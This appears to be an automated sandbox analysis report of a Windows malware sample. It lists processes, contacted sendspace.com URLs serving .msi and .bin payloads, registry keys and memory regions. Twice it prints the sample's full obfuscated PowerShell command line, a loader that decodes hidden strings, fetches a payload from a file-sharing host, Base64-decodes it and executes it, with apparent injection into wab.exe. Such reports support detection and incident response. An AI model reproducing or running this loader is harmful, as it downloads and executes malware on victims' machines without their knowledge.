HumbeRebelnKonsodMungcsTranspSten,aBoaercChomse R in.CreencDi,tooB.ctemmili./ IntrpAdaylrpot.co Dip,/ enlsdVandclCopyi/OvertuHyn.eqBruti2phasc1EndostEmbry8Dokst
';$Barks=Afvarslingerne ' Lini>Kalku ';$Syresaltet254=Afvarslingerne 'SkoldiNeshleN.umexKla p ';$Stereomusik='Goldede';$Tohaandsbetjening
= Afvarslingerne 'Klu peRv.dicrejsehMultio Pr,e samme% Ennoa ennepFr.udpPlanedHor eaMooratWhinnaZyzzy%Bge,g\Val dBt.ftsrRegi,iGrkerdRevolgUds.uePaschwArcosaCh
orrInstrd Rej s Opin.SpotlHunbrua SegmlWarmu Sylle&Klosr&Trinu Fng.eHalfscBaterhCentro nfre BunsetKono, ';Delhed (Afvarslingerne
'An ui$ Sjl.gTil.vlC.oiroGelo,b linda IsaclTeleu:RetsvMPrvkebKnyeneBededlPulv,fOttomaSan,ob Halsrkasini ,ermkledsaaLe.bonPredetdaa.y=Ottin(regracRaggemTragadSni,f
Dioe/P onec uth Kono$IndehTAfsvaoPterihDechiaVantaaCopian,malgd A stsBaut,bSh,rteBooketrgre,jAfdeleraspenaktiviMetabnLizarg
cal )Sagog ');Delhed (Afvarslingerne 'T,ang$IsvafgOptimlForlao eetsb.uperaMellelIntro:Gal eU ReobnS.edemNavleoUnconn,aabeo,kadepMask
ophilalitlliiAd erzNonnei Maninunmo,g Quil=afske$S vsnGShutte Pretn ileeUn apr Cumaa SpageI,ettnKandieKan,i.heptasMisrepVe,trl
DagtiOxalatPho o( Road$ SaltBZoodeaTeutorSatsek TabusUnhos) Nond ');$Generaene=$Unmonopolizing[0];$Lommen= (Afvarslingerne
' arti$ Pre.g Lystl Sp,doDime,b SpilaGlatblcys,o:FamilGBaksglkate uSuantmMisreeHomotlI,proiVandlk HenpeTapet=To efNWinkeeSpearwStolt-DyresO
stenbGadedjSogneeCamemcMounttDek t RibstSMineryUn.ros Showtbassee VirgmFili,. NonpNIndp eE,strt Impe.slap.WH.ldeeTreckbSti,lCly
kelNykalinona,eRosennBangst');$Lommen+=$Mbelfabrikant[1];Delhed ($Lommen);Delhed (Afvarslingerne ',verc$A,rhuG,affllalpinuHannem
ind,eskattlJustii DatakB,rfoeCorus.Stin.HHage eCassiaJointd nitheklunsr UnmesSkand[ Over$Ar.ehDSkr.de Job nAb.maizeoliaUn,ttbPsalmlPartiyA.phi]
ronh=Infra$ GummF ou.se Discrsmuttt PretiCyst lPlur i I,cozRoamsiByzonnMul.igHexah ');$Frugtknudernes=Afvarslingerne 'Torum$SemiwGaxomelT
ntauCradlmSikk eCairflLjertiUd.ikk,ncalecupma.JuvelDseptioAtomiwExhilnDkstolalbeioFl nraRgeredLi edF MechiAsh.nlCracceCupri(Kunst$suitcGgestaeSurlin
subdeDato r alloa DereeNerv,nD sore Tyve, R dd$LobinSPyritpProterScru.iSubmigNederhReduntBn eb) Mart ';$Spright=$Mbelfabrikant[0];Delhed
(Afvarslingerne ' Krs,$ProkugmouselIngenoCapesbCharaa burrl Cons:ForldRKundenNazitnWhimseAwakabLavi.rde.latAnielr Recc=s,ces(
MonoTKr ste Spios SjuntVivis- VestP Syn aKaraktWe nahAtomb Fortr$ emnoSV.lkypRefr.r S,ppiOvertg On,uhHissettran.)Te.ze ');while
(!$Rnnebrtr) {Delhed (Afvarslingerne 'Eurus$Hose gDiaselNot coSuperbSnydeaSeawalStraa: FolkB FernoGha,egOpgrea,ilnan pu.jm
Crueetran l Ran.dSuperelignirHemateLobeo=Fods $FremftPa,asrmelituNeuroeTipni ') ;Delhed $Frugtknudernes;Delhed (Afvarslingerne
'NonloSOptatt PhilaTwin rSvaletDin.e-UnlanS NonslCit,eeKontoeJou.tpRo nd Trter4Dagsa ');Delhed (Afvarslingerne 'Dyrer$.antogFlop.l
Che,o Lo,ebfla.taSlew.lOvert: HarpR SignnundemnD,rrseTopmib underOutletSvredrPos i= Mari( Cho T ,eenePa,losSyvkat,unai- StrmP
KlovaStatutTopsehPopu, Idelf$ DdelSRepulpRegrar F.gai Uds.g kohohBl,nkt For.)Hexas ') ;Delhed (Afvarslingerne 'cry t$ Favoglsninl
SkiloHamelbSapiea Bo.slR,ubo:,eoliRDrabbeUdsorm AfbreMyth m B.vibTe,areHollor Cheee Le,id vade=Somal$Wh,tegScabblLowesoGalopb
Ap.iaSimillOverb: Lim.b PuggaPrewelPhot,l RadiiScintsAvo ctSouleo R guc ProcaDeni rCathod K.eoiRe acobr zegL dporAbortaAggl
pEvilsh SeisyFixat+ D,nk+.arqu%Parab$,ndviUOblignHoflemgenn,oUn.ren KontoThreapSogneoEufeml Remai FritzAlpeniP kkenPentagBuler.BambucEnz,moTeanauPrecin
patitPh,en ') ;$Generaene=$Unmonopolizing[$Remembered];}$Surmounting=305594;$Spejle=29502;Delhed (Afvarslingerne 'Unlea$GangagEle.tl
.edbo RecobBelleaImperlMolti:Em.naC Downr,lagsaF,ikkn Wibei PrimobestagSig.ar BlisasuprapAn,toh Ugebeb,snirPolyg2Terra3 E
sk8 haak Fersk=p,ess BadehGCho ieGaloctStift-PauseCUnsamo .nocnMim.stGenfreHateanStikntUnder Tran.$FormaSFor,dpAvissrTr,nsi
,ndegDamiah,ejectTulip ');Delhed (Afvarslingerne 'Super$ CelagravnelCrimeoRivalb Top aNonnolSkalp:MufflEHelulkTrinbsConflp
Inv,lA hidoMilied PaukeR,mswrOlietiEnspen EntagCoalasFalla Third=Lat r Lui.[,nmanSArraiy ManisIsl,dtFreemeHovedmConsi.priorC
Flabo Fr nnoversv Hd.reVrtsdrSponstGunsl] c.rt:Pagan: Ch tFInlanrme,teokvi kmPresaBAtomia TredsUnfelef,rhe6 Seps4tegniSOut.etGua.frSwa
iiphot.nBesgegBegyn(Impor$LinieCRhodor Am ha.estsnStatii MetaoDapplgSupprrCrickaSp ldpIndsmhS,mpleA.tssrSinap2U res3Miner8Dumet)Octup
');Delhed (Afvarslingerne 'Skins$ antigIncurl.owmoo AndebSomatakantelAchil:Phot.S BranuTerkebAshilgCodbaiBarrea Klarn NonptPr
pr Conju= nett Env,l[Figu,S,vermySmrsysUndert AmeleAbbedmWindf. R.ndTstraneStalaxSll.rtSimie. elleEFi ennCler c,inisoDyrebdBrnefi,verpnEd,ikgT
lsk]Spica:Blas,: spekARereaS Fy iCLini,IGenopI Unr,. B.ldGSoc aeHjordtReproSUdso,tFeudar krmsiTea,snUdgy gNettl(Disp $Ban.oEBearbkoestrs
CanoppeliklS.reao elledljer,ean ifrzooksi Huskn Ko tg Emots Vind)Forb, ');Delhed (Afvarslingerne 'Sk.iv$Middagcompul Sindokus.mbVeineaNedg
lGer.n:FordyMDyn.loSanktrCoppeeUrinedPriva1Techn6Aflbs2Mot.r=Revol$HunyaSApprouJannebKlagegVenteiRel eaPlanlnNoncatSulte.Po.tis
ekstuSisyfb Blegse,tert Yng rUnderiHelbrnRe,segamme.(Etfag$ .pasSSti,lu B.lkr Amstm poloo,ungeuValidnDansktWeldsiOpdatnNon,egIndta,Ther.$ManliS.rosspkavale
DiakjBlufflOffeneTilse) a.st ');Delhed $Mored162;"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bridgewards.Hal && echo t"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Elektroencefalograms = 1;$Unvacuously='Sub';$Unvacuously+='strin';$Unvacuously+='g';Function
Afvarslingerne($corrodentia){$Skrivepapiret=$corrodentia.Length-$Elektroencefalograms;For($Parliaments178=5;$Parliaments178
-lt $Skrivepapiret;$Parliaments178+=6){$Mellemvejs+=$corrodentia.$Unvacuously.Invoke( $Parliaments178, $Elektroencefalograms);}$Mellemvejs;}function
Delhed($Jambos){. ($Syresaltet254) ($Jambos);}$Fertilizing=Afvarslingerne 'KodifM BundoGangszAffeciM.gnel KvinlBeboeaI
ter/Cata 5M,del.Uddat0.orur Wi.d(TilbaW,eganiDa sonDeprid Bag,o,aubewThermsTildm EkspaN AldeT Mim. pejls1Kopi.0Mmesl. Dia.0
ubb;Sl,mb Fami.WSprogiKurvenV,sos6Rema 4Entsv; onse Tarahx Bo.u6Kaval4 A,ls; tomk Cig.rr appev Satd:Anthr1Udmal2.ipho1Mis,a.
Sed.0Sedat),uder Prov.Gdemile StercKopibkOversoU ykk/ F gh2Gutta0 Samm1Fl nc0Grund0skovs1nikke0Srpr,1Rubri Hov.dFParahiRimelr
CamoedottofUlceroStrudxKreop/N.rco1Okap,2Klyng1Refrn.U,elv0Amula ';$Deniably=Afvarslingerne 'S.zinUPraissKittee,azumrUnder-WittyASadd,gNick
eHyposnF,nget C nd ';$Generaene=Afvarslingerne 'Ra,cehmanubtConvatRainwpStddmsHenre:Garro/kn.ge/kerbew HabiwAcylawV.rso.Colons
HumbeRebelnKonsodMungcsTranspSten,aBoaercChomse R in.CreencDi,tooB.ctemmili./ IntrpAdaylrpot.co Dip,/ enlsdVandclCopyi/OvertuHyn.eqBruti2phasc1EndostEmbry8Dokst
';$Barks=Afvarslingerne ' Lini>Kalku ';$Syresaltet254=Afvarslingerne 'SkoldiNeshleN.umexKla p ';$Stereomusik='Goldede';$Tohaandsbetjening
= Afvarslingerne 'Klu peRv.dicrejsehMultio Pr,e samme% Ennoa ennepFr.udpPlanedHor eaMooratWhinnaZyzzy%Bge,g\Val dBt.ftsrRegi,iGrkerdRevolgUds.uePaschwArcosaCh
orrInstrd Rej s Opin.SpotlHunbrua SegmlWarmu Sylle&Klosr&Trinu Fng.eHalfscBaterhCentro nfre BunsetKono, ';Delhed (Afvarslingerne
'An ui$ Sjl.gTil.vlC.oiroGelo,b linda IsaclTeleu:RetsvMPrvkebKnyeneBededlPulv,fOttomaSan,ob Halsrkasini ,ermkledsaaLe.bonPredetdaa.y=Ottin(regracRaggemTragadSni,f
Dioe/P onec uth Kono$IndehTAfsvaoPterihDechiaVantaaCopian,malgd A stsBaut,bSh,rteBooketrgre,jAfdeleraspenaktiviMetabnLizarg
cal )Sagog ');Delhed (Afvarslingerne 'T,ang$IsvafgOptimlForlao eetsb.uperaMellelIntro:Gal eU ReobnS.edemNavleoUnconn,aabeo,kadepMask
ophilalitlliiAd erzNonnei Maninunmo,g Quil=afske$S vsnGShutte Pretn ileeUn apr Cumaa SpageI,ettnKandieKan,i.heptasMisrepVe,trl
DagtiOxalatPho o( Road$ SaltBZoodeaTeutorSatsek TabusUnhos) Nond ');$Generaene=$Unmonopolizing[0];$Lommen= (Afvarslingerne
' arti$ Pre.g Lystl Sp,doDime,b SpilaGlatblcys,o:FamilGBaksglkate uSuantmMisreeHomotlI,proiVandlk HenpeTapet=To efNWinkeeSpearwStolt-DyresO
stenbGadedjSogneeCamemcMounttDek t RibstSMineryUn.ros Showtbassee VirgmFili,. NonpNIndp eE,strt Impe.slap.WH.ldeeTreckbSti,lCly
kelNykalinona,eRosennBangst');$Lommen+=$Mbelfabrikant[1];Delhed ($Lommen);Delhed (Afvarslingerne ',verc$A,rhuG,affllalpinuHannem
ind,eskattlJustii DatakB,rfoeCorus.Stin.HHage eCassiaJointd nitheklunsr UnmesSkand[ Over$Ar.ehDSkr.de Job nAb.maizeoliaUn,ttbPsalmlPartiyA.phi]
ronh=Infra$ GummF ou.se Discrsmuttt PretiCyst lPlur i I,cozRoamsiByzonnMul.igHexah ');$Frugtknudernes=Afvarslingerne 'Torum$SemiwGaxomelT
ntauCradlmSikk eCairflLjertiUd.ikk,ncalecupma.JuvelDseptioAtomiwExhilnDkstolalbeioFl nraRgeredLi edF MechiAsh.nlCracceCupri(Kunst$suitcGgestaeSurlin
subdeDato r alloa DereeNerv,nD sore Tyve, R dd$LobinSPyritpProterScru.iSubmigNederhReduntBn eb) Mart ';$Spright=$Mbelfabrikant[0];Delhed
(Afvarslingerne ' Krs,$ProkugmouselIngenoCapesbCharaa burrl Cons:ForldRKundenNazitnWhimseAwakabLavi.rde.latAnielr Recc=s,ces(
MonoTKr ste Spios SjuntVivis- VestP Syn aKaraktWe nahAtomb Fortr$ emnoSV.lkypRefr.r S,ppiOvertg On,uhHissettran.)Te.ze ');while
(!$Rnnebrtr) {Delhed (Afvarslingerne 'Eurus$Hose gDiaselNot coSuperbSnydeaSeawalStraa: FolkB FernoGha,egOpgrea,ilnan pu.jm
Crueetran l Ran.dSuperelignirHemateLobeo=Fods $FremftPa,asrmelituNeuroeTipni ') ;Delhed $Frugtknudernes;Delhed (Afvarslingerne
'NonloSOptatt PhilaTwin rSvaletDin.e-UnlanS NonslCit,eeKontoeJou.tpRo nd Trter4Dagsa ');Delhed (Afvarslingerne 'Dyrer$.antogFlop.l
Che,o Lo,ebfla.taSlew.lOvert: HarpR SignnundemnD,rrseTopmib underOutletSvredrPos i= Mari( Cho T ,eenePa,losSyvkat,unai- StrmP
KlovaStatutTopsehPopu, Idelf$ DdelSRepulpRegrar F.gai Uds.g kohohBl,nkt For.)Hexas ') ;Delhed (Afvarslingerne 'cry t$ Favoglsninl
SkiloHamelbSapiea Bo.slR,ubo:,eoliRDrabbeUdsorm AfbreMyth m B.vibTe,areHollor Cheee Le,id vade=Somal$Wh,tegScabblLowesoGalopb
Ap.iaSimillOverb: Lim.b PuggaPrewelPhot,l RadiiScintsAvo ctSouleo R guc ProcaDeni rCathod K.eoiRe acobr zegL dporAbortaAggl
pEvilsh SeisyFixat+ D,nk+.arqu%Parab$,ndviUOblignHoflemgenn,oUn.ren KontoThreapSogneoEufeml Remai FritzAlpeniP kkenPentagBuler.BambucEnz,moTeanauPrecin
patitPh,en ') ;$Generaene=$Unmonopolizing[$Remembered];}$Surmounting=305594;$Spejle=29502;Delhed (Afvarslingerne 'Unlea$GangagEle.tl
.edbo RecobBelleaImperlMolti:Em.naC Downr,lagsaF,ikkn Wibei PrimobestagSig.ar BlisasuprapAn,toh Ugebeb,snirPolyg2Terra3 E
sk8 haak Fersk=p,ess BadehGCho ieGaloctStift-PauseCUnsamo .nocnMim.stGenfreHateanStikntUnder Tran.$FormaSFor,dpAvissrTr,nsi
,ndegDamiah,ejectTulip ');Delhed (Afvarslingerne 'Super$ CelagravnelCrimeoRivalb Top aNonnolSkalp:MufflEHelulkTrinbsConflp
Inv,lA hidoMilied PaukeR,mswrOlietiEnspen EntagCoalasFalla Third=Lat r Lui.[,nmanSArraiy ManisIsl,dtFreemeHovedmConsi.priorC
Flabo Fr nnoversv Hd.reVrtsdrSponstGunsl] c.rt:Pagan: Ch tFInlanrme,teokvi kmPresaBAtomia TredsUnfelef,rhe6 Seps4tegniSOut.etGua.frSwa
iiphot.nBesgegBegyn(Impor$LinieCRhodor Am ha.estsnStatii MetaoDapplgSupprrCrickaSp ldpIndsmhS,mpleA.tssrSinap2U res3Miner8Dumet)Octup
');Delhed (Afvarslingerne 'Skins$ antigIncurl.owmoo AndebSomatakantelAchil:Phot.S BranuTerkebAshilgCodbaiBarrea Klarn NonptPr
pr Conju= nett Env,l[Figu,S,vermySmrsysUndert AmeleAbbedmWindf. R.ndTstraneStalaxSll.rtSimie. elleEFi ennCler c,inisoDyrebdBrnefi,verpnEd,ikgT
lsk]Spica:Blas,: spekARereaS Fy iCLini,IGenopI Unr,. B.ldGSoc aeHjordtReproSUdso,tFeudar krmsiTea,snUdgy gNettl(Disp $Ban.oEBearbkoestrs
CanoppeliklS.reao elledljer,ean ifrzooksi Huskn Ko tg Emots Vind)Forb, ');Delhed (Afvarslingerne 'Sk.iv$Middagcompul Sindokus.mbVeineaNedg
lGer.n:FordyMDyn.loSanktrCoppeeUrinedPriva1Techn6Aflbs2Mot.r=Revol$HunyaSApprouJannebKlagegVenteiRel eaPlanlnNoncatSulte.Po.tis
ekstuSisyfb Blegse,tert Yng rUnderiHelbrnRe,segamme.(Etfag$ .pasSSti,lu B.lkr Amstm poloo,ungeuValidnDansktWeldsiOpdatnNon,egIndta,Ther.$ManliS.rosspkavale
DiakjBlufflOffeneTilse) a.st ');Delhed $Mored162;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bridgewards.Hal && echo t"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://www.sendspace.com/pro/dl/6v0nooBc
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/uq21t8
|
104.21.28.80
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://fs12n5.sendspace.com
|
unknown
|
||
|
https://fs13n2.sendspace.com/Vn
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://fs12n5.sendspaX
|
unknown
|
||
|
https://fs13n2.sendspace.com/dlpro/15f7659e72d924eaa8d6602ae7a3a179/664f950b/6v0noo/nNznaMdneHnj42.b
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://fs12n5.sendspace.com
|
unknown
|
||
|
https://fs13n2.sendspace.com/om:443
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/uq21t8P
|
unknown
|
||
|
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
|
http://www.sendspace.com
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.sendspace.com
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/uq21t8XR
|
unknown
|
||
|
https://www.sendspace.com/
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://fs13n2.sendspace.com/
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/6v0noo)
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/6v0noo
|
104.21.28.80
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://fs12n5.sendspace.com/dlpro/49f996627c0399c13e97a7cb372f855b/664f94d2/uq21t8/Blokadens.msi
|
69.31.136.53
|
||
|
https://fs13n2.sendspace.com/dlpro/15f7659e72d924eaa8d6602ae7a3a179/664f950b/6v0noo/nNznaMdneHnj42.bin
|
69.31.136.57
|
There are 21 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
fs13n2.sendspace.com
|
69.31.136.57
|
||
|
fs12n5.sendspace.com
|
69.31.136.53
|
||
|
www.sendspace.com
|
104.21.28.80
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
104.21.28.80
|
www.sendspace.com
|
United States
|
||
|
69.31.136.57
|
fs13n2.sendspace.com
|
United States
|
||
|
69.31.136.53
|
fs12n5.sendspace.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command
|
NULL
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
82A0000
|
direct allocation
|
page execute and read and write
|
|
|
|
5897000
|
trusted library allocation
|
page read and write
|
|
|
|
9D8D000
|
direct allocation
|
page execute and read and write
|
|
|
|
1CB2C082000
|
trusted library allocation
|
page read and write
|
|
|
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
8210000
|
direct allocation
|
page read and write
|
||
|
8148000
|
heap
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
7D20000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
7D2000
|
heap
|
page read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
1CB1C8A0000
|
trusted library allocation
|
page read and write
|
||
|
80DD000
|
heap
|
page read and write
|
||
|
7C90000
|
trusted library allocation
|
page read and write
|
||
|
226C4244000
|
heap
|
page read and write
|
||
|
999000
|
trusted library allocation
|
page read and write
|
||
|
7AD000
|
heap
|
page read and write
|
||
|
23890000
|
remote allocation
|
page read and write
|
||
|
D6FB5FE000
|
unkown
|
page read and write
|
||
|
7FFD9B91A000
|
trusted library allocation
|
page read and write
|
||
|
1CB1C7F2000
|
trusted library allocation
|
page read and write
|
||
|
1CB1C09E000
|
trusted library allocation
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
7F830000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
8160000
|
heap
|
page read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
226C4200000
|
heap
|
page read and write
|
||
|
1CB1C793000
|
trusted library allocation
|
page read and write
|
||
|
760000
|
heap
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
1CB1A0F2000
|
heap
|
page read and write
|
||
|
6C15000
|
heap
|
page execute and read and write
|
||
|
1CB34348000
|
heap
|
page read and write
|
||
|
C306979000
|
stack
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
6F4A000
|
heap
|
page read and write
|
||
|
1CB19EE0000
|
heap
|
page read and write
|
||
|
2365E000
|
stack
|
page read and write
|
||
|
4368000
|
heap
|
page read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
81D0000
|
direct allocation
|
page read and write
|
||
|
2369F000
|
stack
|
page read and write
|
||
|
42A0000
|
trusted library allocation
|
page read and write
|
||
|
1CB34273000
|
heap
|
page read and write
|
||
|
2359E000
|
stack
|
page read and write
|
||
|
7290000
|
trusted library allocation
|
page read and write
|
||
|
80E4000
|
heap
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
7D7E000
|
stack
|
page read and write
|
||
|
23890000
|
remote allocation
|
page read and write
|
||
|
1CB1C875000
|
trusted library allocation
|
page read and write
|
||
|
7E3D000
|
heap
|
page read and write
|
||
|
2A8E000
|
stack
|
page read and write
|
||
|
2390F000
|
stack
|
page read and write
|
||
|
8290000
|
trusted library allocation
|
page execute and read and write
|
||
|
C30667E000
|
stack
|
page read and write
|
||
|
4650000
|
direct allocation
|
page read and write
|
||
|
239C8000
|
direct allocation
|
page read and write
|
||
|
8095000
|
trusted library allocation
|
page read and write
|
||
|
1CB34104000
|
heap
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
1CB1C8AD000
|
trusted library allocation
|
page read and write
|
||
|
2B2E000
|
stack
|
page read and write
|
||
|
7E7B000
|
heap
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
|
226C4240000
|
heap
|
page read and write
|
||
|
2AB0000
|
heap
|
page read and write
|
||
|
1CB1A0AD000
|
heap
|
page read and write
|
||
|
1CB1C84A000
|
trusted library allocation
|
page read and write
|
||
|
9AA000
|
trusted library allocation
|
page execute and read and write
|
||
|
C30790B000
|
stack
|
page read and write
|
||
|
433E000
|
stack
|
page read and write
|
||
|
841000
|
heap
|
page read and write
|
||
|
239D8000
|
direct allocation
|
page read and write
|
||
|
CF8D000
|
direct allocation
|
page execute and read and write
|
||
|
6F39000
|
heap
|
page read and write
|
||
|
4680000
|
direct allocation
|
page read and write
|
||
|
7DEA000
|
trusted library allocation
|
page read and write
|
||
|
1CB1DF5F000
|
trusted library allocation
|
page read and write
|
||
|
E40000
|
heap
|
page read and write
|
||
|
E70000
|
direct allocation
|
page read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
239C8000
|
direct allocation
|
page read and write
|
||
|
8126000
|
heap
|
page read and write
|
||
|
7220000
|
trusted library allocation
|
page read and write
|
||
|
4510000
|
heap
|
page read and write
|
||
|
7FFD9B911000
|
trusted library allocation
|
page read and write
|
||
|
7210000
|
trusted library allocation
|
page read and write
|
||
|
6F97000
|
heap
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
81F0000
|
direct allocation
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
1CB1DDBB000
|
trusted library allocation
|
page read and write
|
||
|
226C4000000
|
heap
|
page read and write
|
||
|
7DE000
|
heap
|
page read and write
|
||
|
829E000
|
stack
|
page read and write
|
||
|
4360000
|
heap
|
page read and write
|
||
|
4610000
|
direct allocation
|
page read and write
|
||
|
239C8000
|
direct allocation
|
page read and write
|
||
|
2DF0000
|
heap
|
page read and write
|
||
|
1CB1A072000
|
heap
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
D6FB4FD000
|
stack
|
page read and write
|
||
|
4630000
|
direct allocation
|
page read and write
|
||
|
8026000
|
trusted library allocation
|
page read and write
|
||
|
9B0000
|
trusted library allocation
|
page read and write
|
||
|
C3067FE000
|
stack
|
page read and write
|
||
|
7FFD9B763000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CB1C85E000
|
trusted library allocation
|
page read and write
|
||
|
774D000
|
remote allocation
|
page execute and read and write
|
||
|
239C8000
|
direct allocation
|
page read and write
|
||
|
2C30000
|
heap
|
page read and write
|
||
|
29EE000
|
unkown
|
page read and write
|
||
|
39D000
|
stack
|
page read and write
|
||
|
239A0000
|
stack
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
C306AB8000
|
stack
|
page read and write
|
||
|
226C4010000
|
heap
|
page read and write
|
||
|
7E28000
|
heap
|
page read and write
|
||
|
6E0000
|
heap
|
page read and write
|
||
|
7D0D000
|
stack
|
page read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
C58D000
|
direct allocation
|
page execute and read and write
|
||
|
7DD0000
|
trusted library allocation
|
page read and write
|
||
|
5880000
|
trusted library allocation
|
page read and write
|
||
|
6C20000
|
heap
|
page read and write
|
||
|
239C8000
|
direct allocation
|
page read and write
|
||
|
C306B37000
|
stack
|
page read and write
|
||
|
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
|
239E8000
|
direct allocation
|
page read and write
|
||
|
1CB2C020000
|
trusted library allocation
|
page read and write
|
||
|
46F1000
|
trusted library allocation
|
page read and write
|
||
|
2372C000
|
stack
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
1CB1A0B9000
|
heap
|
page read and write
|
||
|
1CB1A160000
|
heap
|
page read and write
|
||
|
28BC000
|
heap
|
page read and write
|
||
|
C3066FE000
|
stack
|
page read and write
|
||
|
610000
|
heap
|
page read and write
|
||
|
6C10000
|
heap
|
page execute and read and write
|
||
|
70A7000
|
trusted library allocation
|
page read and write
|
||
|
80E7000
|
heap
|
page read and write
|
||
|
983000
|
trusted library allocation
|
page execute and read and write
|
||
|
8250000
|
trusted library allocation
|
page read and write
|
||
|
239C0000
|
direct allocation
|
page read and write
|
||
|
4751000
|
trusted library allocation
|
page read and write
|
||
|
C3062D6000
|
stack
|
page read and write
|
||
|
80E8000
|
heap
|
page read and write
|
||
|
700D000
|
heap
|
page read and write
|
||
|
239CC000
|
direct allocation
|
page read and write
|
||
|
7FFD9BA10000
|
